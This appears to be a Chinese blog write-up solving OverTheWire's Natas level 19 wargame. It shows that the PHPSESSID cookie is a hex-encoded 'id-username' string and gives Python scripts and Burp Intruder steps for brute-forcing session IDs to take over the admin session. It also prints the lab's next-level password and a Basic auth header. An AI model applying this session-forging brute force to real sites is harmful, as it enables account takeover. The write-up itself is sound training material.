Natas19:

提示,与上一题源码类似,只是PHPSESSID不连续。随便输入username和password,抓包观察PHPSESSID,发现是输入的信息,按照id-username的格式,由ascill码转化为16进制,猜测正确PHPSESSID,应该是id-admin,用python构造字典,burp抓包后使用intruder模块,导入字典后进行暴力破解。

方法1:burp破解

1.抓包得到PHPSESSID=3436322d61646d696e

2.将PHPSESSID进行ASCII hex解码(ascill码转化为16进制),发现其值为id-username格式。可以多次抓包尝试,根据结果猜测正确PHPSESSID,应该是id-admin。

3.由于-admin对应的十六进制是2d61646d696e不变,因此我们只需要构造前面的id对应的十六进制即可。0-9十个十位数对应的十六进制为30-39,我们用python构造字典。

字典脚本(生成数字001-699的16进制):

a = []

for i in range(30,37):

    for j in range(30,40):

        for k in range(30,40):

            a.append( '%d%d%d'%(i,j,k))

with open ("1.txt","w") as f:

    for i in a:

        f.write(i+"\n")

由于前100个id是0-99而不是000-099,我们使用notpad++手动将前100个id生成的16进制数前面的30去掉,得到最终的字典。





1.txt


字典进阶:


上面生成字典的方法太麻烦了,下面脚本可以帮助我们直接生成PHPSESSID值的字典。


Python2.x脚本




# coding=utf-8

import binascii

a = []

for i in range(641):

    k=binascii.hexlify(str(i))+"2d61646d696e"

    a.append(k)

with open ("1.txt","w") as f:

    for i in a:

        f.write(i+"\n")

# python中,函数 hexlify 作用是返回的二进制数据的十六进制表示。

# 每个字节的数据转换成相应的 2 位十六进制表示。因此产生的字符串是原数据的两倍长度。

# unhexlify 则执行反向操作。




Python3.x脚本:




# coding=utf-8

import binascii

a = []

for i in range(641):

    k=binascii.hexlify(bytes(str(i).encode()))+b"2d61646d696e"

    a.append(k.decode())

with open ("1.txt","w") as f:

    for i in a:

        f.write(i+"\n")




关于Python2和Python3的字符编码与界解码问题,看这里


4.下面使用burp开始爆破:








如上图,这个正确结果的length比较特别,既不是所有结果中最长的,也不是最短的,而是一个中间数。我是第一次遇到这种情况,害我找了半天。


另外,如果不想使用python生成脚本,可以直接使用burp的intruder模块中的Cluster bomb模式,将PHPSESSID值的前六位数做3个payload配置,进行爆破。












得到flag:




You are an admin. The credentials for the next level are:

Username: natas20

Password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF




方法2:python破解




# coding=utf-8

import requests

import binascii

url = "http://natas19.natas.labs.overthewire.org/"

payload = {"username":"admin","password":"123"}

for i in range(640):

    headers = {"Cookie":"PHPSESSID="+binascii.hexlify(str(i))+"2d61646d696e","Authorization":"Basic bmF0YXMxOTo0SXdJcmVrY3VabEE5T3NqT2tvVXR3VTZsaG9rQ1BZcw=="}

    req = requests.post(url,params=payload,headers=headers)

    if "You are logged in as a regular user"  in req.text:

        # print(i) #打印i,查看进度

        continue

    else:

        print(i)

        print(req.text)

        exit()







flag:eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF


缺点:速度太慢了,可以考虑使用多线程


参考:


https://www.cnblogs.com/ichunqiu/p/9554885.html
https://www.cnblogs.com/liqiuhao/p/6859052.html
												


											
Natas19 Writeup(Session登录,常见编码,暴力破解)的更多相关文章
	

    
						
  1. 服务认证暴力破解工具Crowbar
		
    服务认证暴力破解工具Crowbar   Crowbar是Kali Linux新增的一款服务认证暴力破解工具.该工具支持OpenVPN.RDP.SSH和VNC服务.该工具具备常见的暴力破解功能,如主机字 ...
    
		
    2. 
								
  2. Natas18 Writeup(Session登录,暴力破解)
		
    Natas18: 一个登录界面,查看源码,发现没有连接数据库,使用Session登录,且$maxid设定了不大的上限,选择采取爆破. 源码解析: <html> <head> & ...
    
		
    3. 
						
  3. ssh访问控制,多次失败登录即封掉IP,防止暴力破解
		
    ssh访问控制,多次失败登录即封掉IP,防止暴力破解 一.系统:Centos6.3 64位 二.方法:读取/var/log/secure,查找关键字 Failed,例如(注:文中的IP地址特意做了删减 ...
    
		
    4. 
						
  4. 忘记秘密利用python模拟登录暴力破解秘密
		
    忘记秘密利用python模拟登录暴力破解秘密: #encoding=utf-8 import itertools import string import requests def gen_pwd_f ...
    
		
    5. 
						
  5. [转帖]利用hydra(九头蛇)暴力破解内网windows登录密码
		
    利用hydra(九头蛇)暴力破解内网windows登录密码 https://blog.csdn.net/weixin_37361758/article/details/77939070 尝试了下 能够 ...
    
		
    6. 
						
  6. DEDE暴力破解后台登录页面
		
    DEDE暴力破解后台登录页面 #!/usr/bin/env python '''/* * author = Mochazz * team = 红日安全团队 * env = pyton3 * */ '' ...
    
		
    7. 
						
  7. Linux用root强制踢掉已登录用户;用fail2ban阻止ssh暴力破解root密码
		
    Linux用root强制踢掉已登录用户   首先使用w命令查看所有在线用户: [root@VM_152_184_centos /]# w 20:50:14 up 9 days, 5:58, 3 use ...
    
		
    8. 
						
  8. openssh安装、设置指定端口号、免密码登录、变量传递、防暴力破解
		
    首先确保机器挂在好光盘镜像,然后查看软件包信息 [root@xuegod63 ~]# df -hFilesystem      Size  Used Avail Use% Mounted on/dev ...
    
		
    9. 
						
  9. 暴力破解 安鸾 Writeup
		
    前三题可以使用hydra进行破解 hydra使用教程 https://www.cnblogs.com/zhaijiahui/p/8371336.html D:\soft\hydra-windows&g ...
    
		
    10. 
		

	


随机推荐
	

    
									
  1. Android开发之《libyuv库的使用》
			
    转自:http://bashell.nodemedia.cn/archives/build-google-libyuv-with-ndk-for-android.html 官方网站:https://c ...
    
			
    2. 
						
  2. TCP\IP协议簇-分层模型
			
    OSI 模型   数据单元 层 功能 主机层 Data(数据) 7. 应用层 网络进程到应用程序. 6. 表示层 数据表示形式,加密和解密,把机器相关的数据转换成独立于机器的数据. 5. 会话层 主机 ...
    
			
    3. 
						
  3. 吴裕雄--天生自然KITTEN编程:画三角形
			
    
			
    4. 
						
  4. file / from install of XXX conflicts with file from package filesystem-XXX
			
    在centos上安装一个偏门软件时出现如下问题: rpm -ivh mNetAssist-0.1.1-2.x86_64.rpm #执行命令 file / from install of XXX con ...
    
			
    5. 
						
  5. centos7限制普通用户访问单一目录下的单一文件
			
    要求给开发同事开设一个查看日志的账号,并限制其只能访问该目录下的单一文件 1.先新建账号 useradd loglook passwd loglook 家目录为/home/loglook 2.日志的属 ...
    
			
    6. 
						
  6. Mybatis分页插件的使用流程
			
    如果你也在用Mybatis,建议尝试该分页插件,这一定是最方便使用的分页插件.该插件支持任何复杂的单表.多表分页. 1.引入PageHelper的jar包 在pom.xml中添加如下依赖: 12345 ...
    
			
    7. 
						
  7. 网络健身O2O,能火吗?
			
       谈到中国想要020的那些项目,总给人一种土豪烧钱的怪异形象,而最终的成败因素也变得简单,也即谁能烧到最后,谁就能称霸市场,可问题在于,前期投入太多,谁也不甘心主动退出,最后,只落得个油尽灯枯.这 ...
    
			
    8. 
						
  8. 【Java】macOS下编译JDK8
			
    安装mercurial brew install mercurial 下载源码 1234 hg clone http://hg.openjdk.java.net/jdk8/jdk8 java-sour ...
    
			
    9. 
						
  9. Spark中Task数量的分析
			
    本文主要说一下Spark中Task相关概念.RDD计算时Task的数量.Spark Streaming计算时Task的数量. Task作为Spark作业执行的最小单位,Task的数量及运行快慢间接决定 ...
    
			
    10. 
						
  10. 疫情期,如何用A/B测试快速迭代你的产品?
			
    作者:友盟+数据科学家 杨玉莲.陆子骏 冠状病毒来袭牵动着每个人的心,但是病毒影响的不仅仅是我们的健康,也以极快的速度极深远地影响了整个移动互联网的发展.主流阵地原本在线下的需求,如医疗和生鲜电商,快 ...
    
			
    11.